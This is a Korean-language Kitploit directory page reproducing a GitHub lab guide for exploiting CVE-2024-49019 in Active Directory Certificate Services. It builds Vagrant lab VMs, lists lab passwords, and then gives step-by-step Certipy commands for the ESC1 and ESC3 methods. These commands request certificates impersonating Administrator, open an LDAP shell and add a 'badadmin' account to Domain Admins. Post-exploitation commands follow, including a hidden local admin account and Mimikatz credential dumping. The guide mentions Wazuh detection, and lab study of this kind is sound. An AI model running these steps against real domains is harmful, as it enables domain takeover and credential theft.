Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-49019-rayng — CVE-2024-49019 악용 | Kitploit
도구/GitHubGitHub/rayngnpc/cve-2024-49019-rayng
Privilege EscalationPersistence MechanismsVulnerability AnalysisExploitationLateral MovementPost-ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubrayngnpc/cve-2024-49019-rayng

CVE-2024-49019-rayng

CVE-2024-49019 악용

321년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기

CVE-2024-49019 악용: 인증 기관 권한 상승

개요

CVE-2024-49019는 AD(Active Directory) 인증서 서비스(AD CS)의 취약점으로, 공격자가 인증서 기반 인증을 악용하여 권한을 상승시킬 수 있습니다. 이 가이드는 Certipy를 사용하여 이 취약점을 악용하는 방법을 보여줍니다.


자격 증명 테이블

Virtual MachineUsernamePassword
Windows Server 2022Administrator!@windowsadmintest101
Windows Server 2022testuser$Vulnerable139
Kali-VMvagrantvagrant
Ubuntu-Wazuhwazuhadmin

Ubuntu-Wazuh VM은 탐지 목적으로 사용됩니다. 탐지 가이드 완화 조치


1단계: 리포지토리 복제 및 가상 머신 설정

먼저 필요한 파일이 포함된 리포지토리를 복제합니다:

root@kitploit:~
git clone https://github.com/rayngnpc/CVE-2024-49019-rayng.git
cd CVE-2024-49019-rayng

Vagrant 설치

계속하기 전에 호스트 머신에 Vagrant를 설치해야 합니다.

Windows용

여기에서 Vagrant를 다운로드하여 설치하거나 PowerShell을 사용하여 설치합니다:

root@kitploit:~
choco install vagrant

Linux용

root@kitploit:~
sudo apt update && sudo apt install vagrant -y

가상 머신 설정

Windows Server 2022 VM

root@kitploit:~
cd windows-server2022
vagrant up

Kali Linux VM

root@kitploit:~
cd kali-VM
vagrant up

Wazuh Ubuntu VM

root@kitploit:~
cd WazuhUbuntu
vagrant up

2단계: 가상 네트워크 구성

이 악용에는 NAT 네트워크가 필요하므로 VirtualBox를 다음과 같이 구성합니다:

Windows에서

아래 명령을 실행하기 전에 VBoxManage가 환경 변수에 추가되어 있는지 확인하세요. 그렇지 않은 경우 전체 경로를 사용하여 명령을 실행하세요:

root@kitploit:~
VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable

VBoxManage가 인식되지 않으면 다음을 사용하세요:

root@kitploit:~
"C:\Program Files\Oracle\VirtualBox\VBoxManage.exe" natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable

Linux에서

root@kitploit:~
VBoxManage natnetwork add --netname NatNet1 --network "10.0.2.0/24" --enable

VirtualBox에서 모든 VM을 확인하고 네트워크 어댑터 NatNetwork - NatNet1에 할당되었는지 확인하세요. 다른 이름으로 NAT 네트워크를 만들 수 있지만 IP 범위는 10.0.2.0/24여야 합니다.


참고: Wazuh 서버용 DNS를 설정하는 것이 좋습니다. 이 경우 DNS는 10.0.2.1이어야 합니다. 인터넷이 없는 경우 API 확인이 실패하여 Wazuh 대시보드에 접속하지 못할 수 있습니다.

3단계: hosts 파일 수정

계속하기 전에 모든 VM이 켜져 있는지 확인하세요.

공격을 시작하려면 Kali Linux VM에 접속하여 /etc/hosts 파일을 업데이트하세요:

root@kitploit:~
sudo nano /etc/hosts

다음 항목을 추가하세요:

root@kitploit:~
10.0.2.121 SERVER2022.pchau.domain.local SERVER2022 pchau-SERVER2022-CA pchau.domain.local

저장하고 종료합니다.


4단계: 환경 설정

CVE-49019 디렉터리로 이동하여 Python 가상 환경을 활성화합니다:

root@kitploit:~
cd ~/CVE-49019
source ~/CVE-49019/rayng/bin/activate

5단계: 악용 방법

이 취약점을 악용하는 방법에는 ESC1과 ESC3 두 가지가 있습니다.

ESC1 방법

취약한 템플릿 찾기

root@kitploit:~
certipy find -dc-ip 10.0.2.121 -username testuser -password '$Vulnerable139' -vulnerable -stdout

인증서 요청

root@kitploit:~
certipy req -ca pchau-SERVER2022-CA -target-ip 10.0.2.121 -u '[email protected]' -p '$Vulnerable139' -template "WebServer" -upn "[email protected]" --application-policies 'Client Authentication'

LDAP 셸 액세스에 인증서 사용

root@kitploit:~
certipy auth -pfx administrator.pfx -ldap-shell -dc-ip 10.0.2.121

새 사용자 추가

root@kitploit:~
add_user badadmin

사용자를 도메인 관리자 그룹에 추가

root@kitploit:~
add_user_to_group badadmin "Domain Admins"

ESC3 방법

취약한 템플릿 찾기

root@kitploit:~
certipy find -dc-ip 10.0.2.121 -username testuser -password '$Vulnerable139' -vulnerable -stdout

테스트 사용자로부터 인증서 요청

root@kitploit:~
certipy req -u [email protected] -p '$Vulnerable139' --application-policies "1.3.6.1.4.1.311.20.2.1" -ca 'pchau-SERVER2022-CA' -template WebServer -dc-ip 10.0.2.121

testuser 인증서를 사용하여 도메인 관리자용 인증서 요청

root@kitploit:~
certipy req -u [email protected] -p '$Vulnerable139' -on-behalf-of PCHAU\\Administrator -template USER -ca 'pchau-SERVER2022-CA' -pfx testuser.pfx -dc-ip 10.0.2.121

이 방법이 ESC1과 다른 점은 PKINIT를 요청하고 TGT에서 해시를 가져올 수 있다는 것입니다

root@kitploit:~
certipy auth -pfx administrator.pfx -dc-ip 10.0.2.121

참고: TGT를 요청하는 중에 다음 오류가 발생한 경우: Kerberos SessionError: KRB_AP_ERR_SKEW(시계 오차가 너무 큼)

해결 방법이 있습니다. 호스트 머신의 시간이 Windows Server 자체와 동일한지 확인하세요. Kali-Linux VM을 Windows Server와 동일하게 업데이트하려면 다음 명령을 실행하세요.

root@kitploit:~
sudo timedatectl set-ntp off

sudo rdate -n 10.0.2.121

Windows Server가 호스트 머신과 동일한 시간대를 갖도록 하세요. 조직 정책 때문에 수정할 수 없는 경우도 있습니다. 호스트 머신과 일치하도록 데이터 시간대 설정으로 이동하여 수동으로 변경하세요. Kali-VM과 Windows Server는 호스트 머신과 동일한 시간을 가져야 합니다.

아래 명령을 사용하여 시간 동기화를 강제로 시도할 수 있습니다

root@kitploit:~
w32tm /config /manualpeerlist:"time.windows.com,0x8" /syncfromflags:manual /reliable:yes /update

관리자 액세스 권한을 얻기 위해 인증서 사용

root@kitploit:~
certipy auth -pfx administrator.pfx -ldap-shell -dc-ip 10.0.2.121

6단계: 악용 후 무엇을 할 수 있나요?

관리자 수준의 액세스 권한을 얻으면 공격자는 다음을 수행할 수 있습니다:

  • 사용자 계정 생성 및 관리
    root@kitploit:~
    net user hacked /add
    net localgroup "Administrators" hacked /add
    
  • Mimikatz를 사용한 자격 증명 덤프:
    root@kitploit:~
    sekurlsa::logonpasswords
    
  • **Impacket을 사용한 Secretdump
  • **Windows Server 셸에 접근하기 위한 Wmiexec
  • **BloodyAD를 사용한 Windows Server 관리자 변경
  • 네트워크 내 피벗 및 수평 이동
  • 지속성 확보
  • 민감한 데이터 유출

탐지 및 완화 전략에 대해서는 탐지 가이드를 참조하세요.


결론

CVE-2024-49019는 인증되지 않은 권한 상승을 허용할 수 있으므로 심각한 보안 위험을 초래합니다. 이 취약점을 이해하고 Wazuh 사용과 같은 적절한 탐지 메커니즘을 구축하는 것은 Active Directory 환경을 보호하는 데 중요합니다.

AD CS 보안에 대한 자세한 내용은 Microsoft 보안 CVE-2024-49019를 참조하세요.

도구 다운로드